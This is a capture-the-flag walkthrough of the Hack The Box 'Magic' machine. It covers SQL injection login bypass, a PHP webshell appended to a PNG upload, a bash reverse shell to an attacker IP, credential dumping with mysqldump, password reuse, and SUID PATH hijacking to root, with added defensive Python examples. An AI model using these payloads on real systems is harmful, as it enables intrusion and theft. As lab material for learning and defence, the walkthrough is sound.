Magic-htb-writeup

0x00 Skills covered

Skills in this chapter: SQL injection login bypass, webshell-in-image upload, using mysqldump, password reuse, SUID privilege escalation, PATH (environment variable) hijacking privilege escalation

Reference: https://0xdf.gitlab.io/2020/08/22/htb-magic.html

Reference: https://tpetersonkth.github.io/2022/03/19/HTB-Magic-Writeup.html

0x01 Getting user

1. Get the target's IP address: 10.10.10.185
2. Scan for open ports:

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- -Pn --min-rate=10000 -oG allports 10.10.10.185
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-10 11:03 CST
Nmap scan report for 10.10.10.185
Host is up (0.29s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 9.35 seconds

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sV -sC -p22,80 -Pn --min-rate=10000 10.10.10.185
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-10 11:04 CST
Nmap scan report for 10.10.10.185
Host is up (0.51s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
| 256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_ 256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Magic Portfolio
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.16 seconds

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- -Pn -sU --min-rate=10000 -oG allports1 10.10.10.185
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-10 11:06 CST
Warning: 10.10.10.185 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.185
Host is up (0.32s latency).
All 65535 scanned ports on 10.10.10.185 are in ignored states.
Not shown: 65459 open|filtered udp ports (no-response), 76 closed udp ports (port-unreach)

Nmap done: 1 IP address (1 host up) scanned in 75.54 seconds

3. So the target exposes only ports 22 and 80 (the full UDP sweep found nothing). Let's see what port 80 serves (screenshot: 1.png).
4. Next, enumerate directories:

┌──(kali㉿kali)-[~/桌面]
└─$ dirsearch -u http://10.10.10.185
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/桌面/reports/http_10.10.10.185/_24-01-10_11-06-53.txt

Target: http://10.10.10.185/

[11:06:53] Starting:
[11:07:55] 301 - 313B - /assets -> http://10.10.10.185/assets/
[11:08:29] 301 - 313B - /images -> http://10.10.10.185/images/
[11:08:39] 302 - 0B - /logout.php -> index.php
[11:09:24] 302 - 3KB - /upload.php -> login.php

Task Completed

5. The redirects from upload.php and logout.php point at a login page:

http://10.10.10.185/login.php

6. The login form is vulnerable to SQL injection, which bypasses authentication. The request, and the resulting redirect to upload.php:

POST /login.php HTTP/1.1
Host: 10.10.10.185
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://10.10.10.185
Connection: close
Referer: http://10.10.10.185/login.php
Cookie: PHPSESSID=74u1q3lb74m4f1jlvpph5ohu24
Upgrade-Insecure-Requests: 1

username=admin' or 1=1-- -&password=admin


HTTP/1.1 302 Found
Date: Wed, 10 Jan 2024 03:17:04 GMT
Server: Apache/2.4.29 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: upload.php
Content-Length: 4221
Connection: close
Content-Type: text/html; charset=UTF-8
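
To make the bypass concrete, here is an added example (mine, not part of the original writeup and not the box's own login.php) that rebuilds the `login` table in an in-memory SQLite database and runs the same `admin' or 1=1-- -` payload against a string-concatenated query and against a parameterised one. The row is constructed from the mysqldump output shown later in this writeup; the function names are assumptions.

```python
import sqlite3

# Constructed sample data: the single row the mysqldump output later in this
# writeup shows in the `login` table.
SAMPLE_ROWS = [(1, "admin", "Th3s3usW4sK1ng")]

# The payload sent to login.php. MySQL needs whitespace after "--" for it to
# start a comment, hence the trailing "-"; SQLite accepts the same form.
BYPASS_USERNAME = "admin' or 1=1-- -"


def make_db():
    """In-memory stand-in for the Magic database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE login ("
        "id INTEGER PRIMARY KEY, "
        "username TEXT NOT NULL UNIQUE, "
        "password TEXT NOT NULL)"
    )
    conn.executemany("INSERT INTO login VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def login_vulnerable(conn, username, password):
    """Query built by string concatenation: the quote in the username closes
    the literal, `or 1=1` makes the WHERE clause true for every row, and the
    comment throws away the password check."""
    query = (
        "SELECT id FROM login WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )
    return conn.execute(query).fetchone() is not None


def login_safe(conn, username, password):
    """Same query with bound parameters: the payload is compared as a
    literal username and matches nothing."""
    query = "SELECT id FROM login WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


def probe_for_injection(conn, username):
    """The usual first test: a lone quote breaks the syntax of a
    concatenated query, which is what a SQL error page or a 500 reveals."""
    try:
        login_vulnerable(conn, username, "x")
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = make_db()
    print("vulnerable query, bypass payload:", login_vulnerable(db, BYPASS_USERNAME, "anything"))
    print("parameterised query, bypass payload:", login_safe(db, BYPASS_USERNAME, "anything"))
```

The point of `probe_for_injection` is the step you take before sending the full payload: a single quote that produces an error is the tell that the input is being spliced into SQL text.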

7. After the redirect we land on a file upload page:

http://10.10.10.185/upload.php

GET /upload.php HTTP/1.1
Host: 10.10.10.185
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: http://10.10.10.185/login.php
Connection: close
Cookie: PHPSESSID=74u1q3lb74m4f1jlvpph5ohu24
Upgrade-Insecure-Requests: 1

8. After some testing: as on earlier boxes there is no plain .php extension bypass, but the server does parse PHP embedded in uploaded images, so we append a webshell to a real image. Note that the upload has to be a .png image. The webshell, and the Windows copy command that appends it to a valid image (binary mode for the image, ASCII mode for the script):

<?php system($_GET['cmd']); ?>

copy 1.png/b + 1.php/a 3.png

Content-Disposition: form-data; name="image"; filename="1.php.jpg"
Content-Type: image/jpeg

The multipart headers above still show the jpg attempt (filename 1.php.jpg), which was actually wrong and did not work; the upload must be a png.

9. The upload succeeds.

10. Request the uploaded file and pass a command through the cmd parameter:

http://10.10.10.185/images/uploads/1.php.png?cmd=id
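
The `copy 1.png/b + 1.php/a 3.png` trick just appends the PHP after a complete image, which is why a check that only inspects the image header lets it through. The added Python example below (mine, not from the original writeup) builds a minimal valid PNG by hand without any image library, appends the same webshell, and shows both that weak header check and a stricter one that walks the PNG chunks and flags anything after IEND. The sample image is constructed and the function names are assumptions.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
# The webshell from this writeup.
PHP_PAYLOAD = b"<?php system($_GET['cmd']); ?>"


def _chunk(ctype, data):
    """Encode one PNG chunk: length, type, data, CRC over type+data."""
    body = ctype + data
    crc = zlib.crc32(body) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + body + struct.pack(">I", crc)


def minimal_png():
    """A valid 1x1 RGB PNG (one red pixel), standing in for 1.png."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # w, h, depth, RGB, 0, 0, 0
    scanline = b"\x00" + b"\xff\x00\x00"                  # filter byte + R,G,B
    return (PNG_SIGNATURE
            + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(scanline))
            + _chunk(b"IEND", b""))


def make_polyglot(png, payload=PHP_PAYLOAD):
    """Equivalent of `copy 1.png/b + 1.php/a 3.png`: image first, PHP after."""
    return png + payload


def passes_magic_check(data):
    """The weak validation: only the first eight bytes are inspected."""
    return data.startswith(PNG_SIGNATURE)


def bytes_after_iend(data):
    """Walk the chunk list and return whatever follows the IEND chunk:
    b"" for a clean file, None if the data is not well-formed PNG."""
    if not passes_magic_check(data):
        return None
    pos = len(PNG_SIGNATURE)
    while pos + 12 <= len(data):
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        ctype = data[pos + 4:pos + 8]
        pos += 12 + length          # length + type + data + CRC
        if ctype == b"IEND":
            return data[pos:]
    return None


def find_php_tag(data):
    """Offset of '<?php' anywhere in the upload, or -1. Catches payloads
    hidden inside a chunk (e.g. a text chunk) rather than appended."""
    return data.find(b"<?php")


if __name__ == "__main__":
    clean = minimal_png()
    evil = make_polyglot(clean)
    print("header check passes:", passes_magic_check(evil))
    print("bytes after IEND:", bytes_after_iend(evil))
```

Rejecting or truncating anything after IEND stops the appended-payload variant, but on its own it does not stop a payload inside a chunk, and none of this matters if the web server is configured to run PHP on a .png path in the first place; the upload filter and the handler mapping both have to be right.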

11. The command executes, so the next step is a reverse shell for an initial foothold. The payload below is URL-encoded; in particular `&` must become %26, otherwise it is treated as a query-string separator and the command is truncated:

bash+-c+"bash+-i+>%26+/dev/tcp/10.10.14.8/443+0>%261"

http://10.10.10.185/images/uploads/1.php.png?cmd=bash+-c+%22bash+-i+%3E%26+/dev/tcp/10.10.14.8/443+0%3E%261%22

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.185] 59372
bash: cannot set terminal process group (1198): Inappropriate ioctl for device
bash: no job control in this shell
www-data@magic:/var/www/Magic/images/uploads$ ls
ls
1.jpg
1.php.png
7.jpg
giphy.gif
logo.png
magic-1424x900.jpg
magic-hat_23-2147512156.jpg
magic-wand.jpg
trx.jpg
www-data@magic:/var/www/Magic/images/uploads$

12. Looking through the web application's files, db.php5 contains the database credentials:

www-data@magic:/var/www/Magic/images/uploads$ cd ../../
cd ../../
www-data@magic:/var/www/Magic$ ls
ls
assets
db.php5
images
index.php
login.php
logout.php
upload.php
www-data@magic:/var/www/Magic$ cat db.php5
cat db.php5
<?php
class Database
{
private static $dbName = 'Magic' ;
private static $dbHost = 'localhost' ;
private static $dbUsername = 'theseus';
private static $dbUserPassword = 'iamkingtheseus';

private static $cont = null;

public function __construct() {
die('Init function is not allowed');
}

public static function connect()
{
// One connection through whole application
if ( null == self::$cont )
{
try
{
self::$cont = new PDO( "mysql:host=".self::$dbHost.";"."dbname=".self::$dbName, self::$dbUsername, self::$dbUserPassword);
}
catch(PDOException $e)
{
die($e->getMessage());
}
}
return self::$cont;
}

public static function disconnect()
{
self::$cont = null;
}
}
www-data@magic:/var/www/Magic$ ls -la /home/
ls -la /home/
total 12
drwxr-xr-x 3 root root 4096 Jul 6 2021 .
drwxr-xr-x 24 root root 4096 Jul 6 2021 ..
drwxr-xr-x 15 theseus theseus 4096 Jul 12 2021 theseus
www-data@magic:/var/www/Magic$

13. There is also a home directory for theseus, but neither `su` nor SSH accepts this password, so it is only the database password. The usual next step is to look inside the database for stored credentials.

private static $dbUsername = 'theseus';
private static $dbUserPassword = 'iamkingtheseus';

www-data@magic:/home/theseus$ mysql -u 'theseus' --password='iamkingtheseus' -D Magic -e 'show tables'
<password='iamkingtheseus' -D Magic -e 'show tables'

Command 'mysql' not found, but can be installed with:

apt install mysql-client-core-5.7
apt install mariadb-client-core-10.1

Ask your administrator to install one of them.

www-data@magic:/home/theseus$

14. The mysql client is not installed, but the listening sockets show MySQL on 127.0.0.1:3306, and checking the other client binaries turns up mysqldump:

www-data@magic:/home/theseus$ 
www-data@magic:/home/theseus$ cd /var/www/Magic
cd /var/www/Magic
www-data@magic:/var/www/Magic$ ls
ls
assets db.php5 images index.php login.php logout.php upload.php
www-data@magic:/var/www/Magic$ netstat -ano | grep 3306
netstat -ano | grep 3306
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN off (0.00/0/0)
www-data@magic:/var/www/Magic$ which mysql
which mysql
www-data@magic:/var/www/Magic$ which mysqldump
which mysqldump
/usr/bin/mysqldump
www-data@magic:/var/www/Magic$

15. mysqldump authenticates to the server just like the mysql client, so we use it to dump the Magic database and read the stored password (naming a table after the database, e.g. `Magic login`, limits the dump to that table):

www-data@magic:/var/www/Magic$ mysqldump --user=theseus --password=iamkingtheseus --host=localhost Magic
<us --password=iamkingtheseus --host=localhost Magic
mysqldump: [Warning] Using a password on the command line interface can be insecure.
-- MySQL dump 10.13 Distrib 5.7.29, for Linux (x86_64)
--
-- Host: localhost Database: Magic
-- ------------------------------------------------------
-- Server version 5.7.29-0ubuntu0.18.04.1

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `login`
--

DROP TABLE IF EXISTS `login`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `login` (
`id` int(6) NOT NULL AUTO_INCREMENT,
`username` varchar(50) NOT NULL,
`password` varchar(100) NOT NULL,
PRIMARY KEY (`id`),
UNIQUE KEY `username` (`username`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `login`
--

LOCK TABLES `login` WRITE;
/*!40000 ALTER TABLE `login` DISABLE KEYS */;
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
/*!40000 ALTER TABLE `login` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2024-01-09 22:21:03
www-data@magic:/var/www/Magic$

16. The dump contains the admin password in plaintext. Trying it elsewhere, it turns out to be theseus's system password as well: classic password reuse.

17. Switch to theseus and read the first flag:

www-data@magic:/var/www/Magic$ su theseus
su theseus
Password: Th3s3usW4sK1ng

theseus@magic:/var/www/Magic$

theseus@magic:/var/www/Magic$ id
id
uid=1000(theseus) gid=1000(theseus) groups=1000(theseus),100(users)
theseus@magic:/var/www/Magic$ cd ~
cd ~
theseus@magic:~$
theseus@magic:~$ ls -la
ls -la
total 80
drwxr-xr-x 15 theseus theseus 4096 Jul 12 2021 .
drwxr-xr-x 3 root root 4096 Jul 6 2021 ..
lrwxrwxrwx 1 theseus theseus 9 Oct 21 2019 .bash_history -> /dev/null
-rw-r--r-- 1 theseus theseus 220 Oct 15 2019 .bash_logout
-rw-r--r-- 1 theseus theseus 15 Oct 21 2019 .bash_profile
-rw-r--r-- 1 theseus theseus 3771 Oct 15 2019 .bashrc
drwxrwxr-x 13 theseus theseus 4096 Jul 6 2021 .cache
drwx------ 13 theseus theseus 4096 Jul 6 2021 .config
drwxr-xr-x 2 theseus theseus 4096 Jul 6 2021 Desktop
drwxr-xr-x 2 theseus theseus 4096 Jul 6 2021 Documents
drwxr-xr-x 2 theseus theseus 4096 Jul 6 2021 Downloads
drwx------ 3 theseus theseus 4096 Jul 6 2021 .gnupg
-rw------- 1 theseus theseus 636 Jul 12 2021 .ICEauthority
drwx------ 3 theseus theseus 4096 Jul 6 2021 .local
drwxr-xr-x 2 theseus theseus 4096 Jul 6 2021 Music
drwxr-xr-x 2 theseus theseus 4096 Jul 6 2021 Pictures
drwxr-xr-x 2 theseus theseus 4096 Jul 6 2021 Public
drwx------ 2 theseus theseus 4096 Jul 6 2021 .ssh
drwxr-xr-x 2 theseus theseus 4096 Jul 6 2021 Templates
-r-------- 1 theseus theseus 33 Jan 9 18:54 user.txt
drwxr-xr-x 2 theseus theseus 4096 Jul 6 2021 Videos
theseus@magic:~$ cat user.txt
cat user.txt
01c111fd7e898d49f4d5779c27702d28
theseus@magic:~$

0x02 Getting root

18. Searching for SUID-root files turns up an unusual binary:

theseus@magic:~$ find / -user root -type f -perm -4000  -ls 2>/dev/null
find / -user root -type f -perm -4000 -ls 2>/dev/null

393232 24 -rwsr-x--- 1 root users 22040 Oct 21 2019 /bin/sysinfo

19. It is executable only by root and by members of the users group, and theseus is in that group:

theseus@magic:~$ cat /etc/group | grep users
cat /etc/group | grep users
users:x:100:theseus

20. Running it prints pages of hardware information; tracing it with ltrace shows where that output comes from:

theseus@magic:~$ /bin/sysinfo
/bin/sysinfo
====================Hardware Info====================
H/W path Device Class Description
====================================================
..........

theseus@magic:~$ ltrace sysinfo
ltrace sysinfo
....................
popen("lshw -short", "r") = 0x5615fbf5a280
popen("fdisk -l", "r") = 0x5615fbf5a280
....................

21. The ltrace output shows popen() calls. popen() hands its string to /bin/sh, and the programs it runs (lshw, fdisk, cat and free) are named without an absolute path, so the shell resolves them through every directory listed in the PATH environment variable, which sysinfo inherits unchanged from whoever runs it.

22. That is a PATH hijacking privilege escalation: prepend a directory we control to PATH and plant our own program under one of those names.

theseus@magic:~$ echo $PATH
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
theseus@magic:~$ export PATH="/tmp:$PATH"
export PATH="/tmp:$PATH"
theseus@magic:~$ echo $PATH
echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
theseus@magic:~$ cd /tmp
cd /tmp
theseus@magic:/tmp$

23. Now create a file named lshw in /tmp containing `bash 1>&0 2>&0` and make it executable. sysinfo reads our program's stdout through the popen pipe, so a bare `bash` would have its output swallowed; redirecting fd 1 and fd 2 onto fd 0 (our reverse-shell socket, which is open in both directions) gives us a usable shell. We chose the name lshw, but any of the other three program names would work just as well.

theseus@magic:~$ cd /tmp
cd /tmp
theseus@magic:/tmp$ echo 'bash 1>&0 2>&0' > /tmp/lshw
echo 'bash 1>&0 2>&0' > /tmp/lshw
theseus@magic:/tmp$ chmod +x /tmp/lshw
chmod +x /tmp/lshw
theseus@magic:/tmp$ ls
ls
lshw
theseus@magic:/tmp$

24. Run sysinfo again: it executes our fake lshw as root, and we get a root shell and the final flag. Note that `id` reports uid=0, i.e. the real uid and not only the effective one; sysinfo must set the real uid to root before popen(), because bash started with euid != ruid drops the effective uid unless run with -p.

theseus@magic:/tmp$ /bin/sysinfo
/bin/sysinfo
====================Hardware Info====================
root@magic:/tmp# id
id
uid=0(root) gid=0(root) groups=0(root),100(users),1000(theseus)
root@magic:/tmp# cd /root
cd /root
root@magic:/root# ls
ls
info.c root.txt snap
root@magic:/root# cat root.txt
cat root.txt
782bc992e58f8ca21ce081b912f06354
root@magic:/root#
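
The added Python example below (mine, not from the original writeup and not sysinfo's own code, which we only see through ltrace) reproduces the mechanism end to end: a bare command name handed to the shell is resolved through PATH, so a same-named script in a directory prepended to PATH wins. It shadows `uname` rather than `lshw` so that it runs on any machine, and contrasts the vulnerable call with the hardened form: absolute path, argv list without a shell, fixed PATH. Function names are assumptions.

```python
import os
import shutil
import subprocess
import tempfile

MARKER = "HIJACKED"
SAFE_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"


def relative_commands(popen_strings):
    """From command strings like those seen in ltrace, return the program
    names that are looked up via PATH (not given as absolute paths)."""
    return [s.split()[0] for s in popen_strings if not s.startswith("/")]


def plant_fake_binary(directory, name):
    """Drop an executable script called `name` into `directory`. On the box
    this is `echo 'bash 1>&0 2>&0' > /tmp/lshw; chmod +x /tmp/lshw`; here
    the script only prints a marker so the outcome can be checked."""
    path = os.path.join(directory, name)
    with open(path, "w") as f:
        f.write("#!/bin/sh\necho %s\n" % MARKER)
    os.chmod(path, 0o755)
    return path


def run_like_sysinfo(command, path):
    """Mimic popen("lshw -short", "r"): a command string handed to /bin/sh,
    bare program name, PATH taken from the (caller-controlled) environment."""
    result = subprocess.run(command, shell=True, capture_output=True,
                            text=True, env={"PATH": path})
    return result.stdout.strip()


def run_hardened(program, args):
    """What a SUID helper should do: resolve the program against a fixed
    PATH (the equivalent of hard-coding /usr/bin/lshw), pass argv directly
    with no shell, and hand the child a clean environment."""
    absolute = shutil.which(program, path=SAFE_PATH)
    if absolute is None:
        raise FileNotFoundError(program)
    result = subprocess.run([absolute] + args, capture_output=True,
                            text=True, env={"PATH": SAFE_PATH})
    return result.stdout.strip()


def demo(target="uname"):
    """Return (output with a hijacked PATH, output from the hardened call)."""
    with tempfile.TemporaryDirectory() as tmp:
        plant_fake_binary(tmp, target)
        hijacked = run_like_sysinfo("%s -s" % target, tmp + ":" + SAFE_PATH)
        genuine = run_hardened(target, ["-s"])
    return hijacked, genuine


if __name__ == "__main__":
    print("PATH-resolved programs:", relative_commands(["lshw -short", "fdisk -l"]))
    hijacked, genuine = demo()
    print("vulnerable pattern ran:", hijacked)
    print("hardened pattern ran:", genuine)
```

The same fix applies to the real binary: `popen("/usr/bin/lshw -short", "r")` still goes through the shell, so beyond absolute paths a SUID program should also scrub the environment (or exec the program directly with execve and a fixed envp) rather than trust whatever PATH, and whatever else, the caller supplied.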

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/241


Author: shiyan
Published: 2024-01-10
Source: https://sh1yan.top/2024/01/10/Magic-htb-writeup-htb-writeup/